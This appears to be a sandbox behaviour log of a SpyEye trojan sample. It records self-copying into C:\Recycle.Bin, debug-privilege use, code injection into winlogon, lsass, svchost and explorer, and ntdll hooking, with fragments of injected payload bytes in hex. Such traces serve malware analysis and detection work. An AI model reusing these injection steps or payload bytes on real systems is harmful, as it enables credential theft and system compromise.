508 C:\Program Files\Java\jre6\bin\jqs.exe 10A0000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1988 C:\WINDOWS\system32\alg.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
1988 C:\WINDOWS\system32\alg.exe 990000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
236 C:\WINDOWS\system32\wscntfy.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
236 C:\WINDOWS\system32\wscntfy.exe AE0000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
724 C:\WINDOWS\system32\msiexec.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
724 C:\WINDOWS\system32\msiexec.exe 990000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe C00000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 650000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 8F0000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
2264 C:\WINDOWS\system32\svchost.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
2264 C:\WINDOWS\system32\svchost.exe 9A0000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1636 C:\WINDOWS\explorer.exe 1F70000 216FA60 page execute and read and write success or wait 1 BAF5387
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1636 C:\WINDOWS\explorer.exe 7C90CFEE 2000 page execute and read and write page execute and read and write success or wait 2 18205EC
636 C:\WINDOWS\system32\winlogon.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
636 C:\WINDOWS\system32\winlogon.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
692 C:\WINDOWS\system32\lsass.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
692 C:\WINDOWS\system32\lsass.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
892 C:\WINDOWS\system32\svchost.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
892 C:\WINDOWS\system32\svchost.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
968 C:\WINDOWS\system32\svchost.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
968 C:\WINDOWS\system32\svchost.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1052 C:\WINDOWS\system32\svchost.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1052 C:\WINDOWS\system32\svchost.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1100 C:\WINDOWS\system32\svchost.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1100 C:\WINDOWS\system32\svchost.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1144 C:\WINDOWS\system32\svchost.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1144 C:\WINDOWS\system32\svchost.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1496 C:\WINDOWS\system32\spoolsv.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1496 C:\WINDOWS\system32\spoolsv.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1636 C:\WINDOWS\explorer.exe BB50000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1828 C:\WINDOWS\system32\ctfmon.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1636 C:\WINDOWS\explorer.exe 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BB695DC
1636 C:\WINDOWS\explorer.exe 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BB72C8B
1636 C:\WINDOWS\explorer.exe BB76E20 2000 page execute and read and write page execute and read and write success or wait 1 BB72C8B
1828 C:\WINDOWS\system32\ctfmon.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1636 C:\WINDOWS\explorer.exe 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BB695DC
448 C:\WINDOWS\system32\svchost.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1636 C:\WINDOWS\explorer.exe BB90A90 2000 page execute and read and write page execute and read and write success or wait 1 BB72CA1
1636 C:\WINDOWS\explorer.exe 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BB695DC
448 C:\WINDOWS\system32\svchost.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
508 C:\Program Files\Java\jre6\bin\jqs.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1636 C:\WINDOWS\explorer.exe BB7F2F8 2000 page execute and read and write page execute and read and write success or wait 1 BB72CB7
1636 C:\WINDOWS\explorer.exe 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BB695DC
1636 C:\WINDOWS\explorer.exe BB7CF58 2000 page execute and read and write page execute and read and write success or wait 1 BB72CCD
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1636 C:\WINDOWS\explorer.exe 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BB695DC
1988 C:\WINDOWS\system32\alg.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1636 C:\WINDOWS\explorer.exe BB90168 2000 page execute and read and write page execute and read and write success or wait 1 BB72D09
1636 C:\WINDOWS\explorer.exe 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BB695DC
1988 C:\WINDOWS\system32\alg.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
236 C:\WINDOWS\system32\wscntfy.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1636 C:\WINDOWS\explorer.exe 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BB6D314
1636 C:\WINDOWS\explorer.exe BB7C210 2000 page execute and read and write page execute and read and write success or wait 1 BB6D314
1636 C:\WINDOWS\explorer.exe 3D949088 2000 page execute and read and write page execute read success or wait 1 BB695DC
236 C:\WINDOWS\system32\wscntfy.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1636 C:\WINDOWS\explorer.exe 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BB7138F
1636 C:\WINDOWS\explorer.exe BB90D98 2000 page execute and read and write page execute and read and write success or wait 1 BB7138F
1636 C:\WINDOWS\explorer.exe 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BB695DC
724 C:\WINDOWS\system32\msiexec.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1636 C:\WINDOWS\explorer.exe 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BB713C1
1636 C:\WINDOWS\explorer.exe BB904E8 2000 page execute and read and write page execute and read and write success or wait 1 BB713C1
1636 C:\WINDOWS\explorer.exe 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BB695DC
724 C:\WINDOWS\system32\msiexec.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
1636 C:\WINDOWS\explorer.exe 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BB713F4
1636 C:\WINDOWS\explorer.exe BB765C8 2000 page execute and read and write page execute and read and write success or wait 1 BB713F4
1636 C:\WINDOWS\explorer.exe 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BB695DC
1636 C:\WINDOWS\explorer.exe 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BB71427
1636 C:\WINDOWS\explorer.exe BB7F660 2000 page execute and read and write page execute and read and write success or wait 1 BB71427
1636 C:\WINDOWS\explorer.exe 71AB4C27 2000 page execute and read and write page execute read success or wait 1 BB695DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
2264 C:\WINDOWS\system32\svchost.exe BAD0000 46000 page execute and read and write page execute and read and write success or wait 3 BAD7627
2264 C:\WINDOWS\system32\svchost.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 BAE2A6F
System Activities:
+ System information queried
System info class Completion Count Source Address
HandleInformation info length mismatch 1 BAF16A3
HandleInformation success or wait 1 BAF16A3
ProcessInformation success or wait 1 BAE7E10
BasicInformation success or wait 65 BAD6959
ProcessorInformation success or wait 63 BAD6959
Token Activities:
+ Token privilege adjusted
Status Privilege Completion Count Source Address
on Debug success or wait 3 18100C4
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00FFFFFF success or wait 2000465151
Thread created PID: 1636 TID: 2432 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2000469924
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2000471649
Privilege adjusted Privilege: Debug On or off: on success or wait 2000473622
File created Path: C:\Recycle.Bin\ Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false object name collision 2000474054
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008200000000000000 Path: C:\Recycle.Bin success or wait 2000475779
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read data or list directory and read ea and read attributes and synchronize Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2000476826
File opened Path: C:\Recycle.Bin\ Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false file is a directory 2000478006
File opened Path: C:\Recycle.Bin\ Access: read attributes and synchronize and generic write Options: synchronous io non alert and open for backup ident Attributes: none Content Overwritten: false success or wait 2000478690
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008200000000000000 Path: C:\Recycle.Bin success or wait 2000479871
File opened Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2000481080
File read Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Offset: none Length: 254976 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 2000484886
File created Path: C:\Recycle.Bin\B6232F3AC2C.exe Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2000836335
File write Path: C:\Recycle.Bin\B6232F3AC2C.exe Offset: none Length: 254976 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 2002639013
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read data or list directory and read ea and read attributes and synchronize Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2002666352
File opened Path: C:\Recycle.Bin\B6232F3AC2C.exe Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2002667287
File other operation Disposition: BasicInformation Data : 00A013805E3CC601ECCB1BD32FB0CC0180FC04DEB397CB0100000000000000000000000000000000 Path: C:\Recycle.Bin\B6232F3AC2C.exe success or wait 2002668510
Section loaded Path: C:\Recycle.Bin\B6232F3AC2C.exe Access: query and write and read and execute and extend size Type: image Baseaddress: BD0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2002670811
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 2850000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2002688443
Section loaded Path: C:\Recycle.Bin\B6232F3AC2C.exe Access: query and read Type: commit Baseaddress: 2130000 Size: 258048 Protection: readonly Mapped to pid: own pid success or wait 2002699449
Process created PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Cmdline: C:\Recycle.Bin\B6232F3AC2C.exe Createflags: 0 success or wait 2002705081
File deleted Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe cannot delete 2003372659
Thread delayed Time: 1 TID: 9266 success or wait 2003373527
File deleted Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe cannot delete 2006962607
Thread delayed Time: 1 TID: 9266 success or wait 2006965801
File deleted Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe cannot delete 2010531630
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2010532053
Thread created PID: 1636 TID: 1448 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2010533068
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2010533664
Thread delayed Time: 1 TID: 9266 success or wait 2010533905
Thread created PID: 1636 TID: 1076 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2010535117
Thread delayed Time: 0 TID: 4214 success or wait 2010535719
Privilege adjusted Privilege: Debug On or off: on success or wait 2010535804
System info queried Type: HandleInformation info length mismatch 2010536156
System info queried Type: HandleInformation success or wait 2010542539
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2010547317
Thread created PID: 1636 TID: 932 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2010547893
System info queried Type: ProcessInformation success or wait 2010551115
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 1FC0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2010553563
Privilege adjusted Privilege: Debug On or off: on success or wait 2010554058
Memory allocated PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2010554980
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2010555089
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2010555209
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2010555318
Memory written PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2014622640
Thread delayed Time: 0 TID: 4214 success or wait 2014624607
File deleted Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe cannot delete 2014625269
Thread delayed Time: 1 TID: 9266 success or wait 2014625574
Memory written PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2014651475
Memory allocated PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: A30000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2014651587
System info queried Type: BasicInformation success or wait 2014651715
System info queried Type: ProcessorInformation success or wait 2014651815
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2014651963
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2014652270
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2014652357
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2014652585
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2014652671
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2014652776
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2014652980
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2014653065
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2014653247
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2014653360
System info queried Type: BasicInformation success or wait 2014653653
System info queried Type: ProcessorInformation success or wait 2014653753
Memory written PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: A30000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2014678545
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2014678672
Memory written PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 12 84 success or wait 2014702293
Memory allocated PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2014702889
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2014702998
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2014703120
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2014703230
Memory written PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2017165071
Thread delayed Time: 0 TID: 4214 success or wait 2017167957
Memory written PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2017241398
Memory allocated PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 9B0000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2017272509
System info queried Type: BasicInformation success or wait 2017272842
System info queried Type: ProcessorInformation success or wait 2017273129
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2017277161
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2017278028
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2017278279
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2017278972
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2017279217
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2017279517
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2017280102
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2017280348
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2017280859
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2017281183
System info queried Type: BasicInformation success or wait 2017281989
System info queried Type: ProcessorInformation success or wait 2017282279
Memory written PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 9B0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2017297329
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2017300505
Memory written PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 0A 84 success or wait 2017349200
Memory allocated PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2017350674
Memory attributes changed PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2017350993
Memory attributes changed PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2017351418
Memory attributes changed PID: 892 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2017351737
